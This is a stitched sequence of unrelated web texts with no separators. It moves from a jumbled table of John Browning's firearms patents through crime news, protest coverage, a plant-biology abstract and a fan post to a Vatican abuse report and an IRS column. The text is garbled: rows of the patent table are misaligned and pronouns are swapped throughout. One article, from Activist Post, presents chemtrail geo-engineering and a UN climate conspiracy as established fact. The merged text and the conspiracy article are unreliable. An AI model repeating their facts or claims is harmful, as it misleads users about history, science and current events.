Their next design , the Model 1917 , US patent # 678,937 was a recoil-powered automatic gun like the Maxims . It was called Model 1917 because in that year , on the verge of entering the war in Europe , the Army found itself completely lacking in modern automatic weapons . In February , 1917 , Browning performed a demonstration at Congress Heights for the benefit of the press , members of Congress , and various foreign representatives . They brought the recoil operated gun they patented in 1901 , and also a gas-operated automatic rifle , the BAR . Both weapons were successfully demonstrated , and began production shortly before the war 's end . [ 4 Pulse ] 689283 March 18 , 1901 December 17 , 1901 AUTOMATIC FIREARM
shotgun 708794 November 7 , 1901 September 9 , 1902 AUTOMATIC FIREARM
pistol 710094 January 11 , 1902 September 30 , 1902 MAGAZINE-GUN
rifle or shotgun 730870 May 6 , 1899 June 16 , 1903 RECOIL-OPERATED FIREARM
shotgun 747585 April 3 , 1902 December 22 , 1903 AUTOMATIC FIREARMS
Colt 1903 automatic pistol [ 10 WP ] 781765 July 10 , 1903 February 7 , 1905 MAGAZINE-GUN
pump action shotgun that would become the Stevens Model 520 [ 1 BrHT ] 808003 May 25 , 1905 December 19 , 1905 FIREARMS
Colt Model 1905 in 45 ACP ( predecessor to the M1911 ) [ 10 WP ] 812326 June 30 , 1904 February 13 , 1906 RECOIL-BRAKE FOR AUTOMATIC GUNS 818739 August 18 , 1905 April 24 , 1906 FIREARM
pistol 947478 June 21 , 1909 January 25 , 1910 SAFETY DEVICE FOR FIREARMS
FN Model 1905 and Colt Vest Pocket in 25 ACP [ 10 WP ] 984519 February 17 , 1910 February 14 , 1911 FIREARM
Model 1911 .45 caliber pistol 1065341 March 20 , 1913 June 24 , 1913 TAKE-DOWN CONSTRUCTION FOR FIREARMS
Browning .22 Automatic Rifle [ 10 WP ] 1083384 November 19 , 1912 January 6 , 1914 FIREARM
semi-automatic 22 caliber rifle . Remington also produced this rifle as the Model 24 . [ 1 BrHT ] 1143170 November 26 , 1913 June 15 , 1915 FIREARM
pump shotgun that would be marketed as the Remington Model 17 . It was John M. Browning 's last repeater-type shotgun . [ 1 BrHT ] 1202024 August 18 , 1914 October 24 , 1916 FIREARM
rifle 1276716 March 30 , 1917 August 27 , 1918 FIREARM
Colt Woodsman [ 10 WP ] 1293022 August 1 , 1917 February 4 , 1919 AUTOMATIC MACHINE-RIFLE
Browning Automatic Rifle ( BAR ) 1372336 April 27 , 1920 March 22 , 1921 FIREARM
rifle 1424553 July 26 , 1919 August 1 , 1922 FIREARM
FN `` Trombone '' pump action .22 cal repeater ( Rare in the USA ) [ 10 WP ] 1464864 September 27 , 1921 August 14 , 1923 FIREARM
rifle 1525065 December 15 , 1923 February 3 , 1925 AUTOMATIC FIREARM
37mm automatic cannon [ 10 WP ] 1533966 December 6 , 1922 April 14 , 1925 AUTOMATIC RIFLE 1533967 December 29 , 1922 April 14 , 1925 AUTOMATIC RIFLE 1533968 January 6 , 1923 April 14 , 1925 AUTOMATIC RIFLE 1578638 October 15 , 1923 March 30 , 1926 FIREARM
Browning Superposed over/under shotgun [ 10 WP ] 1618510 June 28 , 1923 February 22 , 1927 AUTOMATIC FIREARM
led to the Browning Hi-Power
9mm short-recoil , locked-breech , exposed-hammer semi-automatic pistol . This was John M. Browning 's last pistol development . [ 1 BrHT ] 1628226 July 31 , 1923 May 10 , 1927 AUTOMATIC FIREARM
M2 machine gun in 50 caliber [ 10 WP ]
They obtained 128 patents [ 5 L/DD ] .
220271 , 261667 , 306577 , 336287 , and 385238 came from [ 1 BrHT ] . 580923 was found in [ 2 Syd ] . 678937 came from [ 4 Pulse ] . 1293022 came from [ 3 RKM ] . 660244 is thanks to Mr. Pinto ; they got it from [ 9 DLG ] . 441390 , 465339 , 524702 , 549345 , 747585 , 808003 , 947478 , 1065341 , 1424553 , 1525065 , 1578638 , and 1628226 came from [ 10 WP ] . The rest came from digging through the Patent Office image collection . See also [ 6 AM ] and [ 7 Stempel ] .
Val A. Browning was John M. Browning 's son . Among other things , they were president of Browning Arms Company and created several patents of their own , including 2788714 , 3018694 , 3105411 , and 3115063 . [ 8 UMFA ]
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
A near-toothless man who bit their neighbour 's penis after being told to turn down the volume on their Xbox has been jailed .
Jason Martin , 41 , chomped through their victim 's pyjamas “ like a sandwich ” after confronting them outside their flats .
Martin still had blood around their mouth when they were arrested , a court heard .
Surgeons managed to stitch their neighbour 's penis back together but they suffered “ excruciating ” pain .
At Canterbury Crown Court , Martin said : `` It was just a rat bite . I just grabbed into an area , I did n't realise at the time it was their testicles . ”
Judge Adele Williams said Martin 's victim had `` never felt such excruciating pain like that before in theirs life '' .
( Image : SWNS )
They said : `` These were horrendous injuries but you have shown not one flicker of remorse in fact you regard yourself as the victim .
`` I have no doubt that when you lost your temper on this occasion you were determined to inflict as much pain and injury upon your victim as possible .
`` You also set out to humiliate them by taking hold of their penis and testicles and gnawing at them . ''
During their trial , the father-of-one told a jury : “ I did n't do that .. I am not a gay man in any way .
`` The thought of putting a man 's penis in my mouth .. well , it 's not for me . Not in a million years would I do it ! ”
Martin , of Dover , Kent , was today given seven years for wounding with intent , and a year for dangerous driving on bail .
DAYTONA BEACH — Police arrested two Seabreeze High School students after discovering they had brought ammunition and part of a gun to school . They also found the teens had laid out a plan to bring along the weapons while they burglarized two beachside hotels , according to arrest reports .
Police on Monday seized the lower receiving part of an AR-15 semi-automatic rifle , two-fully loaded magazines each with 30 rounds , another magazine with 10 rounds and 29 shotgun shells in the possession of Riley Moran 15 , investigators said .
Moran , and Chase Bibik , 14 , each are charged with possession of a firearm on school property , reports state .
A call made to Moran 's phone number was answered by a man who hung up without saying anything . A man answered the door at Bibik 's Cumberland Avenue home in Ormond Beach on Thursday afternoon but said they had no comment .
Volusia County school district spokesperson Nancy Wait said the incident did not disrupt the campus or pose any threat to students since it was only part of a gun that was found , so the principal did not notify parents .
The offense is a serious one so the students were automatically suspended from the school with a further decision expected on their discipline , Wait said .
`` The school is required to refer students for expulsion to the district placement committee that reviews the disciplinary history of the students , '' Wait said . `` The committee looks at how egregious the offense was to make a determination of disciplinary action to be taken . ''
Police first released details about the Monday arrests on Thursday .
Police were called to the high school around 1:55 p.m. Monday after other students , who saw Moran with the gun part , called the dean of discipline who in turn called authorities , the reports states .
They found a notebook in Bibik 's backpack that had a laid out map of the La Playa Hotel on North Atlantic Avenue . The plan also showed a nearby Hilton hotel and possible plans to burglarize that business , investigators said .
Moran told investigators that they took their father 's disassembled AR-15 and shotgun along with the fully loaded magazines on March 23 , placed them in a pillow case and met Bibik at the pavilion on the eastside of the Granada Boulevard Bridge , reports state .
The shotgun and the upper part of the AR-15 were found at Bibik 's home on Cumberland Avenue in Ormond Beach , police said .
Both Moran and Bibik told investigators that they planned to go to the La Playa hotel at 2500 N. Atlantic Ave. - about a half-mile away from the school - and steal televisions , reports indicate .
Police said the La Playa hotel is closed due to Hurricane Matthew damage .
The teens told police they had no intention of hurting anyone and only wanted to use the weapons to scare people off , reports state .
According to the reports , Moran called Bibik on Sunday and asked them to return the ammunition and the weapons to them `` on the following day of school , '' investigators wrote in their report .
Bibik said they brought the part of semi-automatic rifle and ammunition to campus and gave them to Moran near a vending machine in Building 7 , the reports state .
The pillow case was found in Bibik 's backpack along with a notebook that had a drawn map of the La Playa . The map also showed the Hilton hotel with possible plans to also burglarize that business , police said .
There were five pages of notes on the plan and the location of the security cameras and the possible direction the teens were to take to get away , investigators said .
Instead of getting drunk and grilling on a roof somewhere , several hundred New Yorkers chose to spend their Fourth of July protesting the establishment of the surveillance state that , as we all know by now thanks to leaker-turned-international-fugitive Edward Snowden , has the ability and authority to monitor everything anyone does online . The New York rally , along with dozens of others across the country , was organized by a group called Restore the Fourth that wants to draw attention to the domestic spying operations carried out by the NSA that many says are in gross violation of the Fourth Amendment ( that 's the one that protects you against “ unreasonable search and seizure ” ) .
The protesters gathered in Union Square around noon and embarked an hour lateron a peaceful march to Federal Hall , where the Bill of Rights was dreamed up nearly 224 years ago . Despite the sweltering heat , the demonstrators remained upbeat during the two-mile trek , chanting slogans like , “ Stop the surveillance , restore the Fourth Amendment ! ” and , “ Hey , hey NSA , stop the spying , go away ! ”
The march ended on the stairs of Federal Hall , where , one person took out their iPhone and read the Fourth Amendment aloud and perpetual protester Reverend Billy Talen led a skit that dramatized President Obama and President George W. Bush spying on and arresting ordinary citizens . Everyone in attendance vowed to continue the fight to protect civil liberties , and when Ben Doernberg , who led the NYC march , said their last words and people began to disperse , a man in the crowd yelled at the top of their lungs :
“ Snowden is a hero ! Snowden is a patriot ! ”
A final chant ensued :
“ Snowden is me , Snowden is you , if they arrest Snowden , we know what to do ! ”
Afterward , I talked to Ben about how the protest came together and what the organization 's future goals were .
VICE : What is Restore the Fourth ?
Ben Doernberg : Restore the Fourth is a grassroot , non-partisan movement that has been organized over just the last few weeks to oppose the unconstitutional , sweeping surveillance policies that we found out the NSA is pursuing . Essentially , what we were about today was turning out and showing that people do care about their constitutional rights , and they 're willing to take a stand . I mean , this is a tough day , right ? It 's a holiday , it 's really hot , but people care .
And why should people care ?
People should care because this is a constitutional right , and when the American people do n't stand up for constitutional rights , we 've seen the direction that that goes in—whether its McCarthyism , whether it 's the internment of Japanese Americans during World War II in , essentially , prison camps . When there 's pressure to take away liberties for security , it does n't work , and if people do n't push back , we end up with some of the worst things in American history happening . It 's really important to take a stand as soon as possible to kind of reverse the tide . And I think we 're starting to see that .
There 's a letter written to the Director of National Intelligence , James Clapper , by 26 senators , demanding an explanation on what 's going on . So you are starting to see a groundswell .
Do you think that Americans generally are OK with these NSA spying programs ? Polls on the subject have said different things .
What you see with the polling is , depending on how you ask the question , you get different answers . What that says to people who have experience with polling is that people do n't know . People have n't made up their minds yet . Maybe 20 percent [ of Americans ] feel strongly that [ the spying programs are ] a great idea , about 45 percent are really strongly against it , and then there are about 30 percents in the middle who are n't quite sure yet . I think that 's where a movement like Restore the Fourth comes in—we 're hoping to convince that 30 percent that our constitutional rights are worth fighting for .
What is Restore the Fourth demanding ?
Our specific demands are , firstly , for a congressional investigation , a special committee to investigate what these [ NSA ] policies are and what information [ the government ] thinks it 's entitled to have about Americans . We do n't think that would compromise national security at all . Al Qaeda already knows they 're being watched—the question is , how is the NSA watching the rest of us ? And that would follow in the steps of the Church Committee , a committee in the 1970s formed by the Senate to investigate the abuses under Nixon and under J. Edgar Hoover 's FBI . The second demand is to reform the laws to make them constitutional , and make them explicitly prohibit blanket surveillance without probable cause . That would include section 215 of the Patriot Act , section 702 of FISA , and any other relevant statutes .
And then , finally , we 're calling for James Clapper to resign for lying to Congress when they said that the NSA does not wittingly collect information on millions of Americans , which we now know is a straight-out lie . They were warned about that question in advance , and still chose to give a false answer . So we believe that they need to resign .
It seems like a lot of people showed up , was the turnout more than you expected ? Do you know how many people came out ?
I 'd love to say a million , but I would guess maybe 800 , something like that . I checked with the police , they said maybe 800 , but an exact number is hard to know .
The march seemed carefully orchestrated and it went over incredibly smoothly . How much did you coordinate with the police ?
We talked to them a little bit in advance . Next time we 're going to try to get a permit and try to have amplified speakers and everything . For this march , we basically just kept them up to date , made a few changes in the route as we went along to deal with traffic and such things , but they were actually extremely helpful in working with us and they let us come here . We were worried we would n't be able to get to Federal Hall , but everything went smoother than I ever could have imagined .
When will the next event be , and what form will it take ?
The next event that we 're planning is going to be on August 4 , and like I said , that 's going to be a permitted event . And we 're going to try to essentially bring together all the different groups and make a really broad coalition with everyone who has these Fourth Amendment concerns . Exactly what form that event will take , we 're not sure yet , but as we saw today there are probably 800 people who are going to sign up for a mailing list for the next event , so I 'm pretty optimistic .
More on the surveillance state and the NSA :
Yes , the NSA Can Spy on Every US Citizen
Surveillance Culture Is Not a Two-Way Street
A Brief History of the US Government Spying on Its Citizens
Tennis legend Steffi Graf was on Wednesday appointed the Ayurveda brand ambassador of Kerala .
Details of their remuneration and other terms were n't made public but talks in this regard had been going on for some time .
With this deal the government , feels that it can overcome the after-effects of recent ban on liquor to an extent . The ripple effect of liquor ban had earlier hit the thriving tourism sector .
The Kerala tourism department was given sanction to sign an agreement with Graf to become Ayurveda brand ambassador as part of the department 's 'Visit Kerala Scheme ' , Chandy said .
The tourism department had already held discussions and reached an agreement with the German former World number one tennis player , who had bagged 22 Grand slam single titles .
The 46-year-old Graf , who retired in 1999 , married former World number one men 's tennis player Andre Agassi in October 2001 .
Kerala 's Ayurveda , an ancient system of health care which is famous for its holistic effect on body and mind , attracts a large number of people from the country and abroad every year .
( With PTI inputs )
First Published : Jun 24 , 2015 14:02 IST
By Laird Harrison
OAKLAND , Calif. , Feb 1 ( Reuters ) - When anti-Wall Street protesters set out to take over Oakland 's shuttered convention center on Saturday , they left no doubt about the reception they expected . Scores concealed their faces with bandanas , and dozens carried shields , some painted with anarchist symbols .
What happened next -- a 10-hour street battle in which demonstrators and police pelted each other with tear gas canisters , smoke grenades and other projectiles -- has intensified a debate within the Occupy Wall Street movement over what forms of confrontation it should embrace .
Activists calling for greater equality in income and tighter regulation of financial institutions have clashed with police across the country since September , usually while advocating non-violence . But a series of conflicts with police in Oakland have stood out as the most violent , with one activist , Iraq war veteran Scott Olsen , suffering a brain injury on Oct. 25 .
Protesters on Saturday said they were trying to establish a new headquarters and community center to take the place of the tent camp police dismantled at Frank Ogawa Plaza in front of City Hall last fall . Police lined up on street corners and in front of the convention center to thwart the would-be occupiers .
Objects began flying through the air as soon as demonstrators tore down a section of chain-link fence in front of the building .
`` Of all the ( anti-Wall Street ) marches and rallies in the city of Oakland , this has been the most violent and hostile to the police , '' said Oakland Police Department spokesperson Johnna Watson .
Some 400 protesters were arrested , and several police officers and demonstrators were injured .
`` While we respect every citizen 's right to protest peacefully , we will not tolerate individuals who come to Oakland with an organized strategy to riot , clash with police officers , vandalize property and wreak havoc upon the city , '' Alameda County District Attorney Nancy O'Malley said in a statement .
Demonstrators accused the police of beating them with batons and of trapping them between police lines , then arresting them for supposedly disobeying orders to disperse .
People in the San Francisco Bay Area appeared to be turned off by Occupy 's tactics on Saturday , according to an opinion poll by SurveyUSA .
Of 500 people surveyed on Sunday , 26 percent said they had once supported the Occupy movement and now do not . Added to 31 percent who said they always opposed the movement , the poll suggests a majority of public opinion opposes the group .
Some leaders within the movement were distancing themselves from tactics employed by fellow occupiers on Saturday .
`` A lot of conversation is coming out of that , a lot of self-reflection , '' said Nichola Torbett , a self-described devout Christian who took part in the first Occupy Oakland organizing meetings in September .
Torbett said they have participated in nearly every major Occupy Oakland event and was arrested when police cleared out a protest encampment on Nov. 15 . But they stayed away from the march on Saturday .
`` It was organized by a very militant anarchist segment of the movement , '' they said . `` I support the idea of taking a building , especially for housing those who do n't have housing . But I do n't support it with the kind of triumphal attitude I saw expressed . ''
In November , following a day of mostly peaceful Occupy Oakland rallies that gave way to a night of unrest and over 100 arrests , some activists joined city officials in blaming small bands of agitators who they said provoked police .
Mike King , an organizer of the movement 's effort to shut down West Coast ports on Dec. 12 , stayed away on Saturday because of `` personal obligations . ''
They defended the demonstrators ' attempt to take over a building but said they prefer to devote their energy to building relationships with labor leaders .
Without condemning the attempt to occupy the convention center , labor leaders kept a low profile during the demonstration and its aftermath .
Representatives for the Service Employees International Union , which helped organize Occupy rallies in a number of cities , did not return repeated calls seeking comment , nor did the Alameda Labor Council nor the California Teachers Association .
The California Nurses Association , which has staffed medical stations during previous Occupy Oakland marches , had no official presence at the demonstration Saturday , said spokesperson Chuck Idelson . `` We do n't support violence no matter who is doing it , '' they said .
Still , many occupiers defend Saturday 's action . Shake Anderson , who took part in the march , acknowledged , `` it could have been better organized '' but insisted the goal was worthy .
City officials are unable or unwilling to help the homeless , hungry and unemployed , they said . Occupy Oakland was meeting those needs in its camp at Frank Ogawa Plaza until it was evicted by the police , they said .
Significance Cellular accumulation of reactive oxygen species ( ROS ) such as hydrogen peroxide ( H 2 O 2 ) is associated with stress responses as well as aging . The reactive nature of ROS marks these molecules as a serious threat to cell integrity . Consequently , eukaryotic cells deploy numerous antioxidant enzymes that detoxify ROS to protect them from ROS-induced damage to proteins . Although the importance of antioxidant enzymes is well understood , how these proteins avoid becoming damaged in the hostile , ROS-rich environments in which they function remains unknown . We show that in plant cells the oxidoreductase Nucleoredoxin 1 ( NRX1 ) protects antioxidant enzymes such as catalase from ROS-induced oxidation . Importantly , this protective effect of NRX1 boosted the H 2 O 2 detoxification capacity of catalase , thereby protecting the plant cell from oxidative stress .
Abstract Cellular accumulation of reactive oxygen species ( ROS ) is associated with a wide range of developmental and stress responses . Although cells have evolved to use ROS as signaling molecules , their chemically reactive nature also poses a threat . Antioxidant systems are required to detoxify ROS and prevent cellular damage , but little is known about how these systems manage to function in hostile , ROS-rich environments . Here we show that during oxidative stress in plant cells , the pathogen-inducible oxidoreductase Nucleoredoxin 1 ( NRX1 ) targets enzymes of major hydrogen peroxide ( H 2 O 2 ) -scavenging pathways , including catalases . Mutant nrx1 plants displayed reduced catalase activity and were hypersensitive to oxidative stress . Remarkably , catalase was maintained in a reduced state by substrate-interaction with NRX1 , a process necessary for its H 2 O 2 -scavenging activity . These data suggest that unexpectedly H 2 O 2 -scavenging enzymes experience oxidative distress in ROS-rich environments and require reductive protection from NRX1 for optimal activity .
Footnotes Author contributions : S.K. , G.J.L. , T.L.B. , J.-P.R. , and S.H.S . designed research ; S.K. , R.K. , V.D.-H. , and L.I . performed research ; S.K. , R.K. , V.D.-H. , L.I. , T.L.B. , J.-P.R. , and S.H.S . analyzed data ; and S.K. , T.L.B. , J.-P.R. , and S.H.S . wrote the paper .
The authors declare no conflict of interest .
This article is a PNAS Direct Submission .
Data deposition : Raw and processed proteomic data were uploaded to ProteoSAFe , massive.ucsd.edu/ProteoSAFe/ ( massIVE accession no . MSV000080429 and proteomeXchange accession no . PXD005591 ) .
This article contains supporting information online at www.pnas.org/lookup/suppl/doi:10.1073/pnas.1703344114/-/DCSupplemental .
For a final project in one of my classes , we were to make a book on whatever subject we wanted . I have become an avid brony over the course of this last semester , and so I thought what better final project than to compile everything I 've learned about the fandom into a cute little package.I designed the book as 7x5 inches , so it is very small . I wanted it to be sort of like a pocket guidebook for anyone who either knows nothing about bronies or for a new brony who is just getting into the Little Pony : Friendship is Magic series.In the book , I have a few different sections . First , I defined what a Brony is . Second , I talk about the main characters and some fan favorite background characters in the show . Then , I moved onto the different art forms the amazing brony community does . I talk about the modification of existing Hasbro toys to make them show-accurate as well as the plushie community . I also talk about fanfictions.While the class project only required the book to be 8 pages , mine ended up being 26 in total . At this point there is still a lot more I would like to add . I did not mention every background character that the brony community loves , and there are a lot more sculptors and plush makers that I 'd like to feature in my book.I did use some of the beautiful drawings that other artists have posted on deviantart . I 'd like to give credit to the following : Thanks to for the beautiful mane 6 vectors.Thanks to [ link ] for the page that accompanies my explanation of bronies.Thanks to for the beautiful plush photos.Thanks to as well for the beautiful plush photos ( and for making my Rainbow Dash so beautiful ! ) Thanks to for your wonderful modified ponies.Other views : I decided to upload a low-quality PDF of the book for those that might be interested in seeing the entire thing . You can see it here : [ link ]
Susanne Posel , Contributor
Activist Post
Climate change alarmists are hard at work , pushing their agenda of human-made global warming which ultimately leads to global carbon taxing through the governance of the UN .
Daniel Sarewitz , professor of science and society and co-director of the Consortium for Science , Policy and Outcomes at Arizona State University , asserts that :
There is not any serious debate about whether anthropogenic climate change is happening . Scientists are certain about that , and it is unfortunate that the national debate is lagging so far behind . The move toward convincing the general public that human-made CO2 is responsible for global warming partially stems from a study from 2000 which was co-authored by James Hansen , a prominent eco-fascist . Hansen 's team admits that , “ rapid warming in recent decades has been driven mainly by non-CO2 greenhouse gases . . . not by the products of fossil fuel burning , CO2 and aerosols. ” And then admonishes that the method of controlling emissions output should “ focus on air pollution has practical benefits that unite the interests of developed and developing countries . However , assessment of ongoing and future climate change requires composition-specific long-term global monitoring of aerosol properties . ”
As Hansen states that global warming is not human-made , they still desire to see global governance over emissions regulation and carbon taxation mandated by international law to reduce this imaginary problem . The debate over climate change originated with the 2007 report of the UN Intergovernmental Panel on Climate Change ( IPCC ) . The IPCC emphatically concluded without empirical scientific data , but rather projected conjecture used to create computer models that claimed human activity was the sole cause of the earth 's rising temperature . The IPCC is concerned about the world 's governments not cutting carbon emmissions enough to reduce the CO2 output into the atmosphere . John Reilly , co-director of the Massachusetts Institute of Technology 's ( MIT ) Joint Program on the Science and Policy of Global Change and an expert on climate economic models believes this is the crux of the problem . Reilly blames the governments and their leaders for failing to take the appropriate steps to reduce emissions ; in particular China and the US . They claim that the European Union has rising greenhouse emissions that they have failed to deal with “ properly ” .
In 2009 , Reilly and colleges from MIT collaborated with researchers from Penn State , the Marine Biological Institute in Massachusetts and the U.S. Environmental Protection Agency . They decided to create computer models for climate change projections with the same major flaw that the IPCC made in their models ; they did not account for the erratic weather patterns indicative to earth . Their findings were published , which claimed that large amounts of greenhouse gases would cause the median global temperature to rise over 5 degrees Celsius by 2100 . This was a dramatic difference from the IPCC 's assertion that the rise in global temperature would be 3.5 degrees Celsius . The study also falsely asserted that :
The Arctic would warm up 3 times as predicted by the IPCC
Severe weather patterns would emerge
Ocean levels would rise dramatically
The oceans would endure acidification Reilly proudly touted :
The IPCC suite of scenarios provides … a bit too rosy of a picture . Our study shows that without action , there is virtually no chance that we wo n't enter very dangerous territory . This year , MIT conducted another “ projection ” that warned if countries did not achieve emissions cuts , as they promised the UN , then the world 's temperature would rise by over 4 degrees . Quite a scare tactic . Download Your First Issue Free ! Do You Want to Learn How to Become Financially Independent , Make a Living Without a Traditional Job & Finally Live Free ?
Download Your Free Copy of Counter Markets John Christy , atmospheric scientist at the University of Alabama in Huntsville , IPCC author in 2001 and a well-known skeptic of human-caused climate change , said :
I 'm surprised there are those who think the IPCC is too conservative . I think the simple evidence is very clear—the IPCC models overestimate the warming of the climate system . The IPCC has not commented on their erroneous climate change models . The IPCC 's task was not to create accurate predictions about how the earth would be affected by man 's influence on the biosphere . Their purpose was to engage the world 's governments in a game of control and relinquish of power to the UN over an assumption that could not be verified . Or so they thought .
Survival Solar Battery Charger - Free Today ! Through the use of geo-engineering ( chemtrails ) governments have been dumping massive amounts of pollutants into the upper atmosphere that has caused the thunderclouds to trap heat which has had a dramatic effect on the surface temperature . After spending more than a decade observing the glaciers in Greenland , scientists have concluded that they are not melting with the veracity that climate change alarmists would have us believe . This means that the warning of several feet of rising seas that was conveyed by Al Gore in their film An Inconvenient Truth , will actually only be a rise by inches . According to a study published in the journal Nature , plants are flowering up to 8 times faster than were projected . The authors of the study admit that their previous summations were incorrect and based on erroneous information provided by the IPCC . Data from NASA satellite , Terra , showed that the earth is naturally expelling heat out into space from the upper atmosphere . This cracks the crux of the climate change alarmist 's theory that the earth 's temperatures are rising because the heat is trapped . However , to counter this natural phenomenon , the excessive use of chemtrails has been deployed by governments of industrialized nations to “ cause the problem ” they claim is the fault of man 's CO2 emission . The UN 's agenda , through the IPCC , globalist colleges like MIT and Penn State , and those scientists that have been bought off to assist in peddling false data as empirical scientific research are scaring both world leaders and the general public into buying their climate change nightmare for the purpose of usurping international control over sovereign nations . So far , unfortunately , they have been quite successful . Susanne Posel is the Chief Editor of Occupy Corporatism . Our alternative news site is dedicated to reporting the news as it actually happens ; not as it is spun by the corporately funded mainstream media . You can find us on our Facebook page . var linkwithin_site_id = 557381 ; linkwithin_text='Related Articles : '
ROME—The Vatican secretary of state urged law enforcement agencies , governments and social media sites on Tuesday to take responsibility to protect children from online sexual abuse and exploitation — a statement that came even as one of their diplomats is caught up in an international child porn investigation . Secretary of State Cardinal Pietro Parolin said the case of Monsignor Carlo Capella was “ very painful ” for all involved .
Vatican Secretary of State , Pietro Parolin , spoke at a four-day conference on protecting children online . ( Andrew Medichini / The Associated Press )
Parolin said the Vatican was treating the Capella case with “ utmost concern , utmost commitment ” but also confidentiality to protect the integrity of the investigation . They spoke to reporters on the sidelines of a Catholic Church-sponsored conference on protecting children from online threats . Read more : Windsor police issue arrest warrant for recalled Vatican diplomat in child porn case Police in Windsor , Ont. , said last week that Capella , 50 , allegedly uploaded child porn to a social networking site while visiting a place of worship in the city between Dec. 24 and Dec. 27 .
Article Continued Below
Capella is accused of accessing , possessing and distributing child pornography . Windsor police said they were alerted in February that someone in the city had allegedly uploaded child porn using a social networking site . They obtained records of the internet service provider and determined the dates in question . Windsor police issued a Canada-wide arrest warrant for Capella , though it noted that they had returned to Italy . The Vatican recalled Capella , the No . 4 official in its Washington embassy , after the U.S. State Department notified it Aug. 21 of a “ possible violation of laws relating to child pornography images ” by one of its diplomats in Washington . Parolin — Capella 's boss — headlined the opening of the four-day conference on protecting children online that has drawn leading researchers in public health , Interpol , the UN , government representatives as well as executives from Facebook and Microsoft . The conference ends Friday with proposals being presented to Pope Francis .
Parolin urged participants to “ regain control of the development of the digital world ” to make sure children are protected , saying companies that promote and drive the digital world have a particular responsibility . “ This congress must take responsibility for those minors at the world 's ‘ peripheries ' of which Pope Francis continually speaks , ” Parolin said . “ ( They ) are the preferred target of networks of exploitation and of organized online violence . ”
Article Continued Below
Participants offered sobering statistics about the problem . Last year , Interpol identified five child victims of online abuse every day . Also last year , the Internet Watch Foundation identified more than 57,000 websites containing child sexual abuse images . Sixty per cent of all that material online is hosted in Europe , said Ernesto Caffo , who founded the Italian group Telefono Azzurro , which tracks online child abuse . The conference is addressing both the harm done to children who are abused in child porn and the effects on children 's development from being exposed to online pornography . “ How can we stop these terrorist attacks on the hearts of children ? ” asked the Rev . Hans Zollner , the conference organizer and head of the Center for Child Protection at the Pontifical Gregorian University . — With files from The Canadian Press
Sen. Mitch McConnell ( R-KY ) was for harsher scrutinization of tax-exempt groups before they were against it .
Photo by Alex Wong/Getty Images
A little more than a year ago , around the time nascent Tea Party organizations started getting Proust-length questionnaires from the IRS , there emerged a scandal about political groups winning tax-exempt status . Left-wing groups . The Daily Caller shared pages of memos and anecdotes from Media Matters for America , then shared quotes from Republicans asking why a liberal press-watching organization deserved 501 ( c ) ( 3 ) tax-exempt status .
“ The standards for tax exemption deserve review as a matter of good flight attendantship on the part of Congress , ” Iowa Sen. Chuck Grassley told the website , “ and should be considered as part of any comprehensive tax reform . ”
At least ! “ The collaboration that they talk about on a weekly basis with the White House means this is a political operation , ” shuddered Sean Hannity on their Fox News show , in one of many conservative kibitzes about the Media Matters stories . “ This is not a 501 ( c ) ( 3 ) —you know , tax-exempt organization . This sounds like a political organization and close collaboration with the White House . ”
And this is how politicos used to talk about tax-exempt groups . Until last Friday , actually , it was ordinary to hear them decry or ridicule the 501 ( c ) ( 3 ) and 501 ( c ) ( 4 ) exemptions intended for “ social welfare ” but used pretty nakedly for politics . In the George W. Bush era , the NAACP was investigated on those grounds , and some conservatives executed mid-air high-fives . During the 501 ( c ) ( 4 ) explosion of 2010 , when Americans for Prosperity and American Crossroads started taking Democrats out at the knees , President Obama derided them for “ posing as non-profit , non-political groups . ”
You can watch Obama say that now , if you 're not too busy , because the Washington Free Beacon has compiled the president 's 501 ( c ) ( 3 ) and 501 ( c ) ( 4 ) zingers into ominous video . Oh , and the Washington Free Beacon is a project of the Center for American Freedom , a 501 ( c ) ( 4 ) group whose mission statement is a word-for-word parody of the Center for American Progress , the progressive 501 ( c ) ( 4 ) created by exiled Clintonites . Again : This is how it used to work . People agreed that the tax-exempt system was a joke . If everybody told the same joke at once , the damage and the shaming could be spread around .
That 's not true anymore . The IRS scandal ( or its spinners ) is quickly creating a new right , a right no politician should take away—the right to start a tax-free organization that can play in politics . For the moment , anyone on the left who challenged this status quo is being retconned into an accomplice of the most hated Cincinnati IRS office in American history .
And so , every few hours this week , the National Republican Senatorial Committee has hit out at the Democrats ' 2014 incumbents and candidates . In the past , many of these finks had criticized political-acting 501 ( c ) ( 4 ) s. “ Why did the IRS target these people ? ” asked NRSC spokesperson Brad Dayspring in a Thursday jeremiad typical of the genre . “ Because [ New Hampshire Sen. ] Jeanne Shaheen and [ New York Sen. ] Chuck Schumer pressured them to . Today , Shaheen and Schumer pretend to be outraged by [ their ] OWN actions . ”
Shaheen and Schumer never told the IRS to go after , say , the Kentucky 9/12 Project . They were panicking about groups like Crossroads Grassroots Policy Strategies . According to its mission statement , it was “ a non-profit public policy advocacy organization that is dedicated to educating , equipping , and engaging American citizens to take action on important economic and legislative issues that will shape our nation 's future. ” According to observable reality , it and other Crossroads groups spent around $ 300 million to attack Democratic candidates .
Democrats , awkwardly , have attempted to use the new IRS scandal to remind everyone of why they feared the new 501 ( c ) ( 4 ) s. “ These so-called social welfare organizations must make their goal social welfare and not politics , ” said Nancy Pelosi on Thursday , at their weekly press conference . They made a pitch for the DISCLOSE Act , which withered in 2010 , but would have ( in a manner yet untested by courts ) required tax-exempt groups engaging in politics to disclose their donors .
Republicans have stuck to the new script—and it really is new . The Huffington Post 's Michael McAuliff made a good catch at the start of the week , noticing an old interview with Sen. Mitch McConnell full of the old “ the left abuses tax-exempt status ” gospel . “ Most of the so-called charitable organizations who are involved in political activity in this country , ” said the senator , “ who are , in my judgment , involved in arguable violations of their tax-free status and violations of the campaign laws , happen to be groups on the left . ”
But when McAuliff followed up , McConnell declared that “ people are entitled not only to petition the Congress for redress of grievances under the First Amendment , but to say whatever they choose to in criticism or praise about any of us. ” Money is speech . Even secretive money is speech . Demanding disclosure , or audits , was a threat to that speech .
All manner of political-looking groups are crying havoc now , citing the new standard . The conservative Thomas More Society has produced evidence that a pro-life group could n't get tax exemption unless and until it promised not to protest Planned Parenthood clinics . The Leadership Institute has just revealed the details of a 2011 audit ; complying with that cost them $ 50,000 . Actually , the Leadership Institute audit gives us a perfect example of the shift on 501 status and the rights of man . Here 's how WFB reporter CJ Ciaramella reported it .
